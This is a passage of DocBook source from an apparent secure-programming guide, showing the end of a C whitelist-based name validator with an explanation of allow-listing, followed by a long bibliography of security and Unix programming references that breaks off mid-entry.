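        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789_-";
    size_t len;

    if (s == NULL)
        return false;

    for (len = 0; s[len] != '\0'; len++) {
        /* Stop as soon as the input exceeds the limit. */
        if (len >= MAX_NAME_LEN)
            return false;
        /* Reject any character that is not explicitly allowed. */
        if (strchr(allowed, s[len]) == NULL)
            return false;
    }

    /* An empty string is not an acceptable name. */
    return len > 0;
}
```

<para>
The check never tries to enumerate ``bad'' characters; it states what is
allowed and refuses everything else, so a metacharacter that the
programmer did not think of is rejected by default.
</para>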
|
||
|
||
</chapter>
|
||
|
||
<chapter id="bibliography">
|
||
<title>Bibliography</title>
|
||
|
||
<epigraph>
|
||
<attribution>Ecclesiastes 12:11-12 (NIV)</attribution>
|
||
<para>
|
||
The words of the wise are like goads, their collected sayings like
|
||
firmly embedded nails--given by one Shepherd.
|
||
Be warned, my son, of anything in addition to them.
|
||
Of making many books there is no end, and much study wearies the body.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
<emphasis remap="it">Note that there is a heavy
|
||
emphasis on technical articles available on the web, since this is where
|
||
most of this kind of technical information is available.</emphasis>
|
||
</para>
|
||
|
||
<para>
|
||
[Advosys 2000]
|
||
Advosys Consulting
|
||
(formerly named Webber Technical Services).
|
||
<emphasis remap="it">Writing Secure Web Applications</emphasis>.
|
||
<ulink url="http://advosys.ca/tips/web-security.html">http://advosys.ca/tips/web-security.html</ulink>
|
||
<!-- was http://www.webbertech.com/tips/web-security.html -->
|
||
</para>
|
||
|
||
<para>
|
||
[Al-Herbish 1999]
|
||
Al-Herbish, Thamer.
|
||
1999.
|
||
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>.
|
||
<ulink
|
||
url="http://www.whitefang.com/sup">http://www.whitefang.com/sup</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Aleph1 1996]
|
||
Aleph1.
|
||
November 8, 1996.
|
||
``Smashing The Stack For Fun And Profit''.
|
||
<emphasis remap="it">Phrack Magazine</emphasis>.
|
||
Issue 49, Article 14.
|
||
<!-- ???: may need to double-escape the ampersand here. -->
|
||
<ulink
|
||
url="http://www.phrack.com/search.phtml?view&amp;article=p49-14">http://www.phrack.com/search.phtml?view&amp;article=p49-14</ulink>
|
||
or alternatively
|
||
<ulink
|
||
url="http://www.2600.net/phrack/p49-14.html">http://www.2600.net/phrack/p49-14.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Anonymous 1999]
|
||
Anonymous.
|
||
October 1999.
|
||
Maximum Linux Security:
|
||
A Hacker's Guide to Protecting Your Linux Server and Workstation.
|
||
Sams.
|
||
ISBN: 0672316706.
|
||
</para>
|
||
|
||
<para>
|
||
[Anonymous 1998]
|
||
Anonymous.
|
||
September 1998.
|
||
Maximum Security: A Hacker's Guide to Protecting Your
|
||
Internet Site and Network.
|
||
Sams.
|
||
Second Edition.
|
||
ISBN: 0672313413.
|
||
</para>
|
||
|
||
<para>
|
||
[Anonymous Phrack 2001]
|
||
Anonymous.
|
||
August 11, 2001.
|
||
Once upon a free().
|
||
Phrack, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12.
|
||
<ulink url="http://phrack.org/show.php?p=57&amp;a=9">
|
||
http://phrack.org/show.php?p=57&amp;a=9
|
||
</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[AUSCERT 1996]
|
||
Australian Computer Emergency Response Team (AUSCERT) and O'Reilly.
|
||
May 23, 1996 (rev 3C).
|
||
<emphasis remap="it">A Lab Engineers Check List for Writing Secure Unix Code</emphasis>.
|
||
<ulink
|
||
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bach 1986]
|
||
Bach, Maurice J.
|
||
1986.
|
||
<emphasis remap="it">The Design of the Unix Operating System</emphasis>.
|
||
Englewood Cliffs, NJ: Prentice-Hall, Inc.
|
||
ISBN 0-13-201799-7.
|
||
</para>
|
||
|
||
<para>
|
||
[Beattie 2002]
|
||
Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris Wright,
|
||
Adam Shostack.
|
||
November 2002.
|
||
Timing the Application of Security Patches for Optimal Uptime.
|
||
2002 LISA XVI, November 3-8, 2002, Philadelphia, PA.
|
||
</para>
|
||
|
||
<para>
|
||
[Bellovin 1989]
|
||
Bellovin, Steven M.
|
||
April 1989.
|
||
``Security Problems in the TCP/IP Protocol Suite''.
|
||
Computer Communication Review, Vol. 19, No. 2, pp. 32-48.
|
||
<ulink
|
||
url="http://www.research.att.com/~smb/papers/ipext.pdf">http://www.research.att.com/~smb/papers/ipext.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bellovin 1994]
|
||
Bellovin, Steven M.
|
||
December 1994.
|
||
<emphasis remap="it">Shifting the Odds -- Writing (More) Secure Software</emphasis>.
|
||
Murray Hill, NJ: AT&amp;T Research.
|
||
<ulink
|
||
url="http://www.research.att.com/~smb/talks">http://www.research.att.com/~smb/talks</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bishop 1996]
|
||
Bishop, Matt.
|
||
May 1996.
|
||
``UNIX Security: Security in Programming''.
|
||
<emphasis remap="it">SANS '96</emphasis>. Washington DC (May 1996).
|
||
<ulink
|
||
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Bishop 1997]
|
||
Bishop, Matt.
|
||
October 1997.
|
||
``Writing Safe Privileged Programs''.
|
||
<emphasis remap="it">Network Security 1997</emphasis>.
|
||
New Orleans, LA.
|
||
<ulink
|
||
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Blaze 1996]
|
||
Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier,
|
||
Tsutomu Shimomura, Eric Thompson, and Michael Wiener.
|
||
January 1996.
|
||
``Minimal Key Lengths for Symmetric Ciphers to Provide
|
||
Adequate Commercial Security:
|
||
A Report by an Ad Hoc Group of Cryptographers and Computer Scientists.''
|
||
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.txt">
|
||
ftp://ftp.research.att.com/dist/mab/keylength.txt</ulink> and
|
||
<ulink url="ftp://ftp.research.att.com/dist/mab/keylength.ps">ftp://ftp.research.att.com/dist/mab/keylength.ps</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[CC 1999]
|
||
<emphasis remap="it">The Common Criteria for Information Technology Security Evaluation
|
||
(CC)</emphasis>.
|
||
August 1999.
|
||
Version 2.1.
|
||
Technically identical to International Standard ISO/IEC 15408:1999.
|
||
<ulink
|
||
url="http://csrc.nist.gov/cc/ccv20/ccv2list.htm">http://csrc.nist.gov/cc/ccv20/ccv2list.htm</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[CERT 1998]
|
||
Computer Emergency Response Team (CERT) Coordination Center (CERT/CC).
|
||
February 13, 1998.
|
||
<emphasis remap="it">Sanitizing User-Supplied Data in CGI Scripts</emphasis>.
|
||
CERT Advisory CA-97.25.CGI_metachar.
|
||
<ulink
|
||
url="http://www.cert.org/advisories/CA-97.25.CGI_metachar.html">http://www.cert.org/advisories/CA-97.25.CGI_metachar.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Cheswick 1994]
|
||
Cheswick, William R. and Steven M. Bellovin.
|
||
Firewalls and Internet Security: Repelling the Wily Hacker.
|
||
Full text at
|
||
<ulink url="http://www.wilyhacker.com">
|
||
http://www.wilyhacker.com</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Clowes 2001]
|
||
Clowes, Shaun.
|
||
2001.
|
||
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''.
|
||
<ulink url="http://www.securereality.com.au/archives.html">http://www.securereality.com.au/archives.html</ulink>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[CMU 1998]
|
||
Carnegie Mellon University (CMU).
|
||
February 13, 1998.
|
||
Version 1.4.
|
||
``How To Remove Meta-characters From User-Supplied Data In CGI Scripts''.
|
||
<ulink
|
||
url="ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters">ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Cowan 1999]
|
||
Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
|
||
Jonathan Walpole.
|
||
``Buffer Overflows: Attacks and Defenses for the Vulnerability
|
||
of the Decade''.
|
||
Proceedings of DARPA Information Survivability Conference and Expo (DISCEX),
|
||
<ulink
|
||
url="http://schafercorp-ballston.com/discex">http://schafercorp-ballston.com/discex</ulink>
|
||
SANS 2000.
|
||
<ulink
|
||
url="http://www.sans.org/newlook/events/sans2000.htm">http://www.sans.org/newlook/events/sans2000.htm</ulink>.
|
||
For a copy, see
|
||
<ulink
|
||
url="http://immunix.org/documentation.html">http://immunix.org/documentation.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Cox 2000]
|
||
Cox, Philip.
|
||
March 30, 2001.
|
||
Hardening Windows 2000.
|
||
<ulink url="http://www.systemexperts.com/win2k/hardenW2K11.pdf">http://www.systemexperts.com/win2k/hardenW2K11.pdf</ulink>.
|
||
<!-- http://www.systemexperts.com/win2k.shtml -->
|
||
</para>
|
||
|
||
<para>
|
||
[Dobbertin 1996]
|
||
Dobbertin, H.
|
||
1996.
|
||
The Status of MD5 After a Recent Attack.
|
||
RSA Laboratories' CryptoBytes.
|
||
Vol. 2, No. 2.
|
||
</para>
|
||
|
||
<para>
|
||
[Felten 1997]
|
||
Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach.
|
||
Web Spoofing: An Internet Con Game.
|
||
Technical Report 540-96 (revised Feb. 1997).
|
||
Department of Computer Science, Princeton University.
|
||
<ulink url="http://www.cs.princeton.edu/sip/pub/spoofing.pdf">
|
||
http://www.cs.princeton.edu/sip/pub/spoofing.pdf
|
||
</ulink>
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Fenzi 1999]
|
||
Fenzi, Kevin, and Dave Wreski.
|
||
April 25, 1999.
|
||
<emphasis remap="it">Linux Security HOWTO</emphasis>.
|
||
Version 1.0.2.
|
||
<ulink
|
||
url="http://www.tldp.org/HOWTO/Security-HOWTO.html">http://www.tldp.org/HOWTO/Security-HOWTO.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[FHS 1997]
|
||
Filesystem Hierarchy Standard (FHS 2.0).
|
||
October 26, 1997.
|
||
Filesystem Hierarchy Standard Group, edited by Daniel Quinlan.
|
||
Version 2.0.
|
||
<ulink
|
||
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Filipski 1986]
|
||
Filipski, Alan and James Hanko.
|
||
April 1986.
|
||
``Making Unix Secure.''
|
||
Byte (Magazine).
|
||
Peterborough, NH: McGraw-Hill Inc.
|
||
Vol. 11, No. 4.
|
||
ISSN 0360-5280.
|
||
pp. 113-128.
|
||
</para>
|
||
|
||
<para>
|
||
[Flake 2001]
|
||
Flake, Halvar.
|
||
Auditing Binaries for Security Vulnerabilities.
|
||
<ulink url="http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html">http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[FOLDOC]
|
||
Free On-Line Dictionary of Computing.
|
||
<ulink
|
||
url="http://foldoc.doc.ic.ac.uk/foldoc/index.html">
|
||
http://foldoc.doc.ic.ac.uk/foldoc/index.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Forristal 2001]
|
||
Forristal, Jeff, and Greg Shipley.
|
||
January 8, 2001.
|
||
Vulnerability Assessment Scanners.
|
||
Network Computing.
|
||
<ulink url="http://www.nwc.com/1201/1201f1b1.html">http://www.nwc.com/1201/1201f1b1.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[FreeBSD 1999]
|
||
FreeBSD, Inc.
|
||
1999.
|
||
``Secure Programming Guidelines''.
|
||
<emphasis remap="it">FreeBSD Security Information</emphasis>.
|
||
<ulink
|
||
url="http://www.freebsd.org/security/security.html">http://www.freebsd.org/security/security.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Friedl 1997]
|
||
Friedl, Jeffrey E. F.
|
||
1997.
|
||
Mastering Regular Expressions.
|
||
O'Reilly.
|
||
ISBN 1-56592-257-3.
|
||
</para>
|
||
|
||
<para>
|
||
[FSF 1998]
|
||
Free Software Foundation.
|
||
December 17, 1999.
|
||
<emphasis remap="it">Overview of the GNU Project</emphasis>.
|
||
<ulink
|
||
url="http://www.gnu.ai.mit.edu/gnu/gnu-history.html">http://www.gnu.ai.mit.edu/gnu/gnu-history.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[FSF 1999]
|
||
Free Software Foundation.
|
||
January 11, 1999.
|
||
<emphasis remap="it">The GNU C Library Reference Manual</emphasis>.
|
||
Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C Library.
|
||
Available at, for example,
|
||
<ulink url="http://www.netppl.fi/~pp/glibc21/libc_toc.html">http://www.netppl.fi/~pp/glibc21/libc_toc.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Fu 2001]
|
||
Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster.
|
||
August 2001.
|
||
``Dos and Don'ts of Client Authentication on the Web''.
|
||
Proceedings of the 10th USENIX Security Symposium,
|
||
Washington, D.C., August 2001.
|
||
<ulink url="http://cookies.lcs.mit.edu/pubs/webauth.html">
|
||
http://cookies.lcs.mit.edu/pubs/webauth.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Gabrilovich 2002]
|
||
Gabrilovich, Evgeniy, and Alex Gontmakher.
|
||
February 2002.
|
||
``Inside Risks: The Homograph Attack''.
|
||
Communications of the ACM.
|
||
Volume 45, Number 2.
|
||
Page 128.
|
||
|
||
</para>
|
||
|
||
<para>
|
||
[Galvin 1998a]
|
||
Galvin, Peter.
|
||
April 1998.
|
||
``Designing Secure Software''.
|
||
<emphasis remap="it">Sunworld</emphasis>.
|
||
<ulink
|
||
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">http://www.sunworld.com/swol-04-1998/swol-04-security.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Galvin 1998b]
|
||
Galvin, Peter.
|
||
August 1998.
|
||
``The Unix Secure Programming FAQ''.
|
||
<emphasis remap="it">Sunworld</emphasis>.
|
||
<ulink
|
||
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Garfinkel 1996]
|
||
Garfinkel, Simson and Gene Spafford.
|
||
April 1996.
|
||
<emphasis remap="it">Practical UNIX &amp; Internet Security, 2nd Edition</emphasis>.
|
||
ISBN 1-56592-148-8.
|
||
Sebastopol, CA: O'Reilly &amp; Associates, Inc.
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/puis">http://www.oreilly.com/catalog/puis</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Garfinkle 1997]
|
||
Garfinkel, Simson.
|
||
August 8, 1997.
|
||
21 Rules for Writing Secure CGI Programs.
|
||
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
|
||
http://webreview.com/wr/pub/97/08/08/bookshelf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Gay 2000]
|
||
Gay, Warren W.
|
||
October 2000.
|
||
Advanced Unix Programming.
|
||
Indianapolis, Indiana: Sams Publishing.
|
||
ISBN 0-67231-990-X.
|
||
</para>
|
||
|
||
<para>
|
||
[Geodsoft 2001]
|
||
Geodsoft.
|
||
February 7, 2001.
|
||
Hardening OpenBSD Internet Servers.
|
||
<ulink url="http://www.geodsoft.com/howto/harden">http://www.geodsoft.com/howto/harden</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Graham 1999]
|
||
Graham, Jeff.
|
||
May 4, 1999.
|
||
<emphasis remap="it">Security-Audit's Frequently Asked Questions (FAQ)</emphasis>.
|
||
<ulink
|
||
url="http://lsap.org/faq.txt">http://lsap.org/faq.txt</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Gong 1999]
|
||
Gong, Li.
|
||
June 1999.
|
||
<emphasis remap="it">Inside Java 2 Platform Security</emphasis>.
|
||
Reading, MA: Addison Wesley Longman, Inc.
|
||
ISBN 0-201-31000-7.
|
||
</para>
|
||
|
||
<para>
|
||
[Gundavaram Unknown]
|
||
Gundavaram, Shishir, and Tom Christiansen.
|
||
Date Unknown.
|
||
<emphasis remap="it">Perl CGI Programming FAQ</emphasis>.
|
||
<ulink
|
||
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Hall 1999]
|
||
Hall, Brian "Beej".
|
||
Beej's Guide to Network Programming Using Internet Sockets.
|
||
January 13, 1999.
|
||
Version 1.5.5.
|
||
<ulink url="http://www.ecst.csuchico.edu/~beej/guide/net">http://www.ecst.csuchico.edu/~beej/guide/net</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Howard 2002]
|
||
Howard, Michael and David LeBlanc.
|
||
2002.
|
||
Writing Secure Code.
|
||
Redmond, Washington: Microsoft Press.
|
||
ISBN 0-7356-1588-8.
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 12207]
|
||
International Organization for Standardization (ISO).
|
||
1995.
|
||
Information technology -- Software life cycle processes.
|
||
ISO/IEC 12207:1995.
|
||
<!-- http://www.iso.ch/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=21208&ICS1=35&ICS2=80&ICS3= -->
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 13335]
|
||
International Organization for Standardization (ISO).
|
||
ISO/IEC TR 13335.
|
||
Guidelines for the Management of IT Security (GMITS).
|
||
<!-- This is a technical report, not a standard -->
|
||
Note that this is a five-part technical report (not a standard); see also
|
||
ISO/IEC 17799:2000.
|
||
It includes:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
ISO 13335-1: Concepts and Models for IT Security
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-2: Managing and Planning IT Security
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-3: Techniques for the Management of IT Security
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-4: Selection of Safeguards
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ISO 13335-5: Safeguards for External Connections
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 17799]
|
||
International Organization for Standardization (ISO).
|
||
December 2000.
|
||
Code of Practice for Information Security Management.
|
||
ISO/IEC 17799:2000.
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 9000]
|
||
International Organization for Standardization (ISO).
|
||
2000.
|
||
Quality management systems - Fundamentals and vocabulary.
|
||
ISO 9000:2000.
|
||
See
|
||
<ulink url="http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html">
|
||
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[ISO 9001]
|
||
International Organization for Standardization (ISO).
|
||
2000.
|
||
Quality management systems - Requirements.
|
||
ISO 9001:2000.
|
||
</para>
|
||
|
||
<para>
|
||
[Jones 2000]
|
||
Jones, Jennifer.
|
||
October 30, 2000.
|
||
``Banking on Privacy''.
|
||
InfoWorld, Volume 22, Issue 44.
|
||
San Mateo, CA: International Data Group (IDG).
|
||
pp. 1-12.
|
||
</para>
|
||
|
||
<para>
|
||
[Kelsey 1998]
|
||
Kelsey, J., B. Schneier, D. Wagner, and C. Hall.
|
||
March 1998.
|
||
"Cryptanalytic Attacks on Pseudorandom Number Generators."
|
||
Fast Software Encryption, Fifth International Workshop Proceedings
|
||
(March 1998), Springer-Verlag, 1998, pp. 168-188.
|
||
<ulink url="http://www.counterpane.com/pseudorandom_number.html">
|
||
http://www.counterpane.com/pseudorandom_number.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Kernighan 1988]
|
||
Kernighan, Brian W., and Dennis M. Ritchie.
|
||
1988.
|
||
<emphasis remap="it">The C Programming Language</emphasis>.
|
||
Second Edition.
|
||
Englewood Cliffs, NJ: Prentice-Hall.
|
||
ISBN 0-13-110362-8.
|
||
</para>
|
||
|
||
<para>
|
||
[Kim 1996]
|
||
Kim, Eugene Eric.
|
||
1996.
|
||
<emphasis remap="it">CGI Developer's Guide</emphasis>.
|
||
SAMS.net Publishing.
|
||
ISBN: 1-57521-087-8.
|
||
<ulink
|
||
url="http://www.eekim.com/pubs/cgibook">http://www.eekim.com/pubs/cgibook</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Kolsek 2002]
|
||
Kolsek, Mitja. December 2002.
|
||
Session Fixation Vulnerability in Web-based Applications.
|
||
<ulink url="http://www.acros.si/papers/session_fixation.pdf">
|
||
http://www.acros.si/papers/session_fixation.pdf</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Kuchling 2000]
|
||
Kuchling, A.M.
|
||
2000.
|
||
Restricted Execution HOWTO.
|
||
<ulink url="http://www.python.org/doc/howto/rexec/rexec.html">http://www.python.org/doc/howto/rexec/rexec.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Kuhn 2002]
|
||
Kuhn, Markus G.
|
||
Optical Time-Domain Eavesdropping Risks
|
||
of CRT displays.
|
||
Proceedings of the 2002 IEEE Symposium on Security and Privacy,
|
||
Oakland, CA, May 12-15, 2002.
|
||
<ulink url="http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf">
|
||
http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[LSD 2001]
|
||
The Last Stage of Delirium.
|
||
July 4, 2001.
|
||
<emphasis remap="it">UNIX Assembly Codes Development
|
||
for Vulnerabilities Illustration Purposes.</emphasis>
|
||
<ulink url="http://lsd-pl.net/papers.html#assembly">http://lsd-pl.net/papers.html#assembly</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McClure 1999]
|
||
McClure, Stuart, Joel Scambray, and George Kurtz.
|
||
1999.
|
||
<emphasis remap="it">Hacking Exposed: Network Security Secrets and Solutions</emphasis>.
|
||
Berkeley, CA: Osborne/McGraw-Hill.
|
||
ISBN 0-07-212127-0.
|
||
</para>
|
||
|
||
<para>
|
||
[McKusick 1999]
|
||
McKusick, Marshall Kirk.
|
||
January 1999.
|
||
``Twenty Years of Berkeley Unix: From AT&amp;T-Owned to
|
||
Freely Redistributable.''
|
||
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/opensources/book/kirkmck.html">http://www.oreilly.com/catalog/opensources/book/kirkmck.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 1999]
|
||
McGraw, Gary, and Edward W. Felten.
|
||
December 1998.
|
||
Twelve Rules for developing more secure Java code.
|
||
Javaworld.
|
||
<ulink url="http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html">http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 1999]
|
||
McGraw, Gary, and Edward W. Felten.
|
||
January 25, 1999.
|
||
Securing Java: Getting Down to Business with Mobile Code, 2nd Edition.
|
||
John Wiley &amp; Sons.
|
||
ISBN 047131952X.
|
||
<ulink url="http://www.securingjava.com">http://www.securingjava.com</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 2000a]
|
||
McGraw, Gary and John Viega.
|
||
March 1, 2000.
|
||
Make Your Software Behave: Learning the Basics of Buffer Overflows.
|
||
<ulink
|
||
url="http://www-4.ibm.com/software/developer/library/overflows/index.html">http://www-4.ibm.com/software/developer/library/overflows/index.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[McGraw 2000b]
|
||
McGraw, Gary and John Viega.
|
||
April 18, 2000.
|
||
Make Your Software Behave: Software strategies
|
||
In the absence of hardware,
|
||
you can devise a reasonably secure random number generator through software.
|
||
<ulink url="http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security">http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Miller 1995]
|
||
Miller, Barton P.,
|
||
David Koski, Cjin Pheow Lee, Vivekananda Maganty,
|
||
Ravi Murthy, Ajitkumar Natarajan, and Jeff Steidl.
|
||
1995.
|
||
Fuzz Revisited: A Re-examination of the Reliability of
|
||
UNIX Utilities and Services.
|
||
<ulink url="ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf">ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Miller 1999]
|
||
Miller, Todd C. and Theo de Raadt.
|
||
``strlcpy and strlcat -- Consistent, Safe, String Copy and Concatenation''.
|
||
<emphasis remap="it">Proceedings of Usenix '99</emphasis>.
|
||
<ulink
|
||
url="http://www.usenix.org/events/usenix99/millert.html">http://www.usenix.org/events/usenix99/millert.html</ulink> and
|
||
<ulink
|
||
url="http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST">http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Mookhey 2002]
|
||
Mookhey, K. K.
|
||
The Unix Auditor's Practical Handbook.
|
||
<ulink url="http://www.nii.co.in/tuaph.html">http://www.nii.co.in/tuaph.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Mudge 1995]
|
||
Mudge.
|
||
October 20, 1995.
|
||
<emphasis remap="it">How to write Buffer Overflows</emphasis>.
|
||
l0pht advisories.
|
||
<ulink
|
||
url="http://www.l0pht.com/advisories/bufero.html">http://www.l0pht.com/advisories/bufero.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Murhammer 1998]
|
||
Murhammer, Martin W., Orcun Atakan, Stefan Bretz,
|
||
Larry R. Pugh, Kazunari Suzuki, and David H. Wood.
|
||
October 1998.
|
||
TCP/IP Tutorial and Technical Overview.
|
||
IBM International Technical Support Organization.
|
||
<ulink url="http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf">http://www.redbooks.ibm.com/pubs/pdfs/redbooks/gg243376.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[NCSA]
|
||
NCSA Secure Programming Guidelines.
|
||
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Neumann 2000]
|
||
Neumann, Peter.
|
||
2000.
|
||
"Robust Nonproprietary Software."
|
||
Proceedings of the 2000 IEEE Symposium on Security and Privacy
|
||
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
|
||
Los Alamitos, CA: IEEE Computer Society.
|
||
pp. 122-123.
|
||
</para>
|
||
|
||
<para>
|
||
[NSA 2000]
|
||
National Security Agency (NSA).
|
||
<!-- Conceivably the author should be listed as the
|
||
Information Assurance Technical Framework Forum (IATFF), but that's
|
||
not what the document cover says. -->
|
||
September 2000.
|
||
Information Assurance Technical Framework (IATF).
|
||
<ulink url="http://www.iatf.net">http://www.iatf.net</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Open Group 1997]
|
||
The Open Group.
|
||
1997.
|
||
<emphasis remap="it">Single UNIX Specification, Version 2 (UNIX 98)</emphasis>.
|
||
<ulink
|
||
url="http://www.opengroup.org/online-pubs?DOC=007908799">http://www.opengroup.org/online-pubs?DOC=007908799</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[OSI 1999]
|
||
Open Source Initiative.
|
||
1999.
|
||
<emphasis remap="it">The Open Source Definition</emphasis>.
|
||
<ulink
|
||
url="http://www.opensource.org/osd.html">http://www.opensource.org/osd.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Opplinger 1998]
|
||
Oppliger, Rolf.
|
||
1998.
|
||
Internet and Intranet Security.
|
||
Norwood, MA: Artech House.
|
||
ISBN 0-89006-829-1.
|
||
</para>
|
||
|
||
<para>
|
||
[Paulk 1993a]
|
||
Mark C. Paulk, Bill Curtis, Mary Beth Chrissis, and Charles V. Weber.
|
||
Capability Maturity Model for Software, Version 1.1.
|
||
Software Engineering Institute, CMU/SEI-93-TR-24.
|
||
DTIC Number ADA263403, February 1993.
|
||
<ulink url="http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html">http://www.sei.cmu.edu/activities/cmm/obtain.cmm.html</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Paulk 1993b]
|
||
Mark C. Paulk, Charles V. Weber, Suzanne M. Garcia, Mary Beth Chrissis, and Marilyn W. Bush.
|
||
Key Practices of the Capability Maturity Model, Version 1.1.
|
||
Software Engineering Institute.
|
||
CMU/SEI-93-TR-25, DTIC Number ADA263432, February 1993.
|
||
</para>
|
||
|
||
<para>
|
||
[Peteanu 2000]
|
||
Peteanu, Razvan.
|
||
